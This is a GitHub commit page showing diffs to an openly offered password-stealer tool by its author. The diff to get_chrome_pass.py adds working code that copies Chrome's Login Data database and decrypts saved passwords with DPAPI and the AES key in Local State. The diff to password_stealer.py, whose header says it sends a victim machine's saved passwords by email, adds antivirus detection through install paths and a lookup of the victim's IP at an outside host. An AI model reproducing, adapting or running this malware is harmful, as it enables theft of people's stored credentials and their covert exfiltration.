Skip to content

Commit

Permalink
v1.7 [Using colorama + ChromePassStealerFix + PyinstallerPathFinderFix
Browse files Browse the repository at this point in the history
  • Loading branch information
@PushpenderIndia
PushpenderIndia committed Apr 20, 2022
1 parent e07e9cc commit 4a9a332
Show file tree
Hide file tree
Showing 7 changed files with 273 additions and 156 deletions.
45 changes: 2 additions & 43 deletions banners.py
View file
Original file line number Diff line number Diff line change
Expand Up @@ -65,27 +65,6 @@
"""

figlet_ogre = """
_____ _ __
/__ \___ ___| |__ /\ \ \_____ __/\ /\___ _ __ ___ ___
/ /\/ _ \/ __| '_ \ / \/ / _ \ \ /\ / / /_/ / _ \| '__/ __|/ _ \
/ / | __/ (__| | | / /\ / (_) \ V V / __ / (_) | | \__ \ __/
\/ \___|\___|_| |_\_\ \/ \___/ \_/\_/\/ /_/ \___/|_| |___/\___|
"""

figlet_slant = """
______ __ _ __ __ __
/_ __/__ _____/ /_ / | / /___ _ __/ / / /___ _____________
/ / / _ \/ ___/ __ \/ |/ / __ \ | /| / / /_/ / __ \/ ___/ ___/ _ \
/ / / __/ /__/ / / / /| / /_/ / |/ |/ / __ / /_/ / / (__ ) __/
/_/ \___/\___/_/ /_/_/ |_/\____/|__/|__/_/ /_/\____/_/ /____/\___/
"""

figlet_small = """
Expand All @@ -96,27 +75,7 @@
"""

figlet_smslant = """
______ __ _ __ __ __
/_ __/__ ____/ / / |/ /__ _ __/ // /__ _______ ___
/ / / -_) __/ _ \/ / _ \ |/|/ / _ / _ \/ __(_-</ -_)
/_/ \__/\__/_//_/_/|_/\___/__,__/_//_/\___/_/ /___/\__/
"""

figlet_standard = """
_____ _ _ _ _ _
|_ _|__ ___| |__ | \ | | _____ _| | | | ___ _ __ ___ ___
| |/ _ \/ __| '_ \| \| |/ _ \ \ /\ / / |_| |/ _ \| '__/ __|/ _ \
| | __/ (__| | | | |\ | (_) \ V V /| _ | (_) | | \__ \ __/
|_|\___|\___|_| |_|_| \_|\___/ \_/\_/ |_| |_|\___/|_| |___/\___|
"""


def get_banner():
return random.choice([figlet_ansi_shadow, figlet_big, figlet_doom, figlet_drpepper, figlet_ogre, figlet_slant, figlet_small, figlet_smslant, figlet_standard])
return random.choice([figlet_ansi_shadow, figlet_big, figlet_doom, figlet_drpepper, figlet_small])
171 changes: 132 additions & 39 deletions get_chrome_pass.py
View file
Original file line number Diff line number Diff line change
@@ -1,42 +1,135 @@
import os, sqlite3, win32crypt, six
#python -m pip install --upgrade pywin32
import os
import sys
import shutil
import sqlite3
import json, base64

from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.ciphers import (Cipher, algorithms, modes)

class GetChromePass:
def __init__(self):
self.data_path = os.path.expanduser('~').replace("\\", '/') + "/AppData/Local/Google/Chrome/User Data/Default"
self.login_db = os.path.join(self.data_path, 'Login Data')
self.result = ""

def start(self):
#Retriving Password Hash From Database File
c = sqlite3.connect(self.login_db)
cursor = c.cursor()
select_statement = "SELECT origin_url, username_value, password_value FROM logins"
cursor.execute(select_statement)
login_data = cursor.fetchall()

credentials_dict = {}

#Decrypting password
for url, user_name, pwd, in login_data:
pwd = win32crypt.CryptUnprotectData(pwd, None, None, None, 0) #Tuple
credentials_dict[url] = (user_name, pwd[1])

#Iterating Each Creds and Storing it in "self.result"
for url, credentials in six.iteritems(credentials_dict):
if credentials[1]:
self.result += "\n\nURL : " + url
self.result += "\nUsername : " + credentials[0]
self.result += "\nPassword : " + credentials[1].decode('utf-8')

else:
self.result += "\n\nURL : " + url
self.result += "\nUsername : NOT FOUND"
self.result += "\nPassword : NOT FOUND"

return self.result

if __name__ == '__main__':
test = GetChromePass()
result = test.start()
print(result)
self.passwordlog = ""
self.APP_DATA_PATH = os.environ['LOCALAPPDATA']
self.DB_PATH = r'Google\Chrome\User Data\Default\Login Data'
self.NONCE_BYTE_SIZE = 12

def start(self):
_full_path = os.path.join(self.APP_DATA_PATH, self.DB_PATH)
_temp_path = os.path.join(self.APP_DATA_PATH, 'sqlite_file')
if os.path.exists(_temp_path):
os.remove(_temp_path)
shutil.copyfile(_full_path,_temp_path)
self.show_password(_temp_path)
return self.passwordlog

def show_password(self, db_file):
conn = sqlite3.connect(db_file)
_sql = 'select signon_realm,username_value,password_value from logins'
for row in conn.execute(_sql):
host = row[0]
if host.startswith('android'):
continue
name = row[1]
value = self.chrome_decrypt(row[2])
_info = 'Hostname: %s\nUsername: %s\nPassword: %s\n\n' %(host,name,value)
self.passwordlog += _info
conn.close()
os.remove(db_file)

def chrome_decrypt(self, encrypted_txt):
if sys.platform == 'win32':
try:
if encrypted_txt[:4] == b'\x01\x00\x00\x00':
decrypted_txt = self.dpapi_decrypt(encrypted_txt)
return decrypted_txt.decode()
elif encrypted_txt[:3] == b'v10':
decrypted_txt = self.aes_decrypt(encrypted_txt)
return decrypted_txt[:-16].decode()
except WindowsError:
return None
else:
try:
return unix_decrypt(encrypted_txt)
except NotImplementedError:
return None

def encrypt(self, cipher, plaintext, nonce):
cipher.mode = modes.GCM(nonce)
encryptor = cipher.encryptor()
ciphertext = encryptor.update(plaintext)
return (cipher, ciphertext, nonce)

def decrypt(self, cipher, ciphertext, nonce):
cipher.mode = modes.GCM(nonce)
decryptor = cipher.decryptor()
return decryptor.update(ciphertext)

def get_cipher(self, key):
cipher = Cipher(
algorithms.AES(key),
None,
backend=default_backend()
)
return cipher

def dpapi_decrypt(self, encrypted):
import ctypes
import ctypes.wintypes

class DATA_BLOB(ctypes.Structure):
_fields_ = [('cbData', ctypes.wintypes.DWORD),
('pbData', ctypes.POINTER(ctypes.c_char))]

p = ctypes.create_string_buffer(encrypted, len(encrypted))
blobin = DATA_BLOB(ctypes.sizeof(p), p)
blobout = DATA_BLOB()
retval = ctypes.windll.crypt32.CryptUnprotectData(
ctypes.byref(blobin), None, None, None, None, 0, ctypes.byref(blobout))
if not retval:
raise ctypes.WinError()
result = ctypes.string_at(blobout.pbData, blobout.cbData)
ctypes.windll.kernel32.LocalFree(blobout.pbData)
return result

def unix_decrypt(self, encrypted):
if sys.platform.startswith('linux'):
password = 'peanuts'
iterations = 1
else:
raise NotImplementedError

from Crypto.Cipher import AES
from Crypto.Protocol.KDF import PBKDF2

salt = 'saltysalt'
iv = ' ' * 16
length = 16
key = PBKDF2(password, salt, length, iterations)
cipher = AES.new(key, AES.MODE_CBC, IV=iv)
decrypted = cipher.decrypt(encrypted[3:])
return decrypted[:-ord(decrypted[-1])]

def get_key_from_local_state(self):
jsn = None
with open(os.path.join(os.environ['LOCALAPPDATA'], r"Google\Chrome\User Data\Local State"), encoding='utf-8', mode ="r") as f:
jsn = json.loads(str(f.readline()))
return jsn["os_crypt"]["encrypted_key"]

def aes_decrypt(self, encrypted_txt):
encoded_key = self.get_key_from_local_state()
encrypted_key = base64.b64decode(encoded_key.encode())
encrypted_key = encrypted_key[5:]
key = self.dpapi_decrypt(encrypted_key)
nonce = encrypted_txt[3:15]
cipher = self.get_cipher(key)
return self.decrypt(cipher, encrypted_txt[15:], nonce)


if __name__=="__main__":
Main = GetChromePass()
password = Main.start()
print(password)



51 changes: 46 additions & 5 deletions password_stealer.py
View file
Original file line number Diff line number Diff line change
@@ -1,14 +1,15 @@
#!/usr/bin/python3
import time, smtplib, platform, getpass
import get_chrome_pass, get_wifi_pass #Self Written Modules
import requests
import os

#==================================================================
#Author : Pushpender Singh
#Website: https://technowlogy.tk
#==================================================================
#Usage: Module is send Saved Password of Victim machine to Email.
#==================================================================
#Github: https://github.com/Technowlogy-Pushpender/
#Github: https://github.com/PushpenderIndia/
#==================================================================

class SendPass:
Expand All @@ -25,7 +26,7 @@ def get_chrome_browser_creds(self):
self.log += chrome.start()
except Exception:
time.sleep(10)
self.get_browser_creds()
self.get_chrome_browser_creds()
self.send_mail(self.log)
self.log = ""

Expand All @@ -43,10 +44,50 @@ def get_wifi_creds(self):

def get_system_info(self):
uname = platform.uname()
os = uname[0] + " " + uname[2] + " " + uname[3]
operating_system = uname[0] + " " + uname[2] + " " + uname[3]
computer_name = uname[1]
user = getpass.getuser()
return "Operating System:\t" + os + "\nComputer Name:\t\t" + computer_name + "\nUser:\t\t\t\t" + user

# Finding AV
av = "Unknown"
if os.path.exists('C:\\Program Files\\Windows Defender'):
av = 'Windows Defender'
if os.path.exists('C:\\Program Files\\AVAST Software\\Avast'):
av = 'Avast'
if os.path.exists('C:\\Program Files\\AVG\\Antivirus'):
av = 'AVG'
if os.path.exists('C:\\Program Files\\Avira\\Launcher'):
av = 'Avira'
if os.path.exists('C:\\Program Files\\IObit\\Advanced SystemCare'):
av = 'Advanced SystemCare'
if os.path.exists('C:\\Program Files\\Bitdefender Antivirus Free'):
av = 'Bitdefender'
if os.path.exists('C:\\Program Files\\COMODO\\COMODO Internet Security'):
av = 'Comodo'
if os.path.exists('C:\\Program Files\\DrWeb'):
av = 'Dr.Web'
if os.path.exists('C:\\Program Files\\ESET\\ESET Security'):
av = 'ESET'
if os.path.exists('C:\\Program Files\\GRIZZLY Antivirus'):
av = 'Grizzly Pro'
if os.path.exists('C:\\Program Files\\Kaspersky Lab'):
av = 'Kaspersky'
if os.path.exists('C:\\Program Files\\IObit\\IObit Malware Fighter'):
av = 'Malware fighter'
if os.path.exists('C:\\Program Files\\360\\Total Security'):
av = '360 Total Security'

try:
IP_Address = requests.get('http://ip.42.pl/raw').text
except: IP_Address = "Unknown"

sys_logs = "Operating System: " + operating_system + "\n"
sys_logs += "Computer Name: " + computer_name + "\n"
sys_logs += "User: " + user + "\n"
sys_logs += "IP Address: " + IP_Address + "\n"
sys_logs += "Anti Virus: " + av

return sys_logs

def send_mail(self, message):
try:
Expand Down
Loading

0 comments on commit 4a9a332

Please sign in to comment.